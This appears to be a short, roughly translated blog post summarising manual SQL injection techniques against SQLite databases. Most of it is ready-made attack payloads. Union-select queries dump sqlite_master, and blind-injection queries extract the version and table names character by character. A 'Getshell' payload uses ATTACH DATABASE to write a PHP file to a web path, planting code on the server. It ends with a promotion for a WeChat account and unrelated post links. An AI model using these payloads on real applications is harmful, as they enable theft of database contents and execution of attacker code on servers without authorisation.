SQLite manual injection method summary

SQLite download website: www.sqlite.org/download.ht…

Sqlite management tool: www.yunqa.de/delphi/prod…

Sqlite_master hides the table as follows:

Fields: type/name/tbl_name/rootpage/SQL

Sqlite injection test:

1, Union select query

select * from test where id =1 and 1=2 union select name,sql from sqlite_master

2, the blinds

Select * from test where id =1 union select 1,length(sqlite_version())=6

Select * from test where id =1 and substr(sqlite_version(),1,1)=’3

Select * from test where id =1 and substr((select name from sqlite_master where type=’table’ limit 0,1),1,1)=’T’ // get the first part of the sqlite table name T

3, Getshell

select * from test where id =1 ; ATTACH DATABASE ‘C:\\Sqlite\\xiaozi.php’ AS pwn ; CREATE TABLE pwn.exp (dataz text) ; INSERT INTO pwn.exp (dataz) VALUES (‘ <? php phpinfo(); ? > ‘); —

The last

Welcome to pay attention to personal wechat public number: Bypass–, once a week original high quality dry goods.

Reference links:

SQLite under the Windows 7 installation configuration and use method a: www.codeceo.com/article/win…

How to install and configure SQLite in Windows :www.weste.net/2014/10-08/…

SQLite manual injection method summary

Related Posts

Python String/list/tuple/dictionary conversion to each other – Python zero basic tutorial

Python guides you to the best Admissions guide! Is there a school girl you want

【 Face recognition 】 based on Gabor+SV and PCA+SVM to achieve face recognition MATLAB source GUI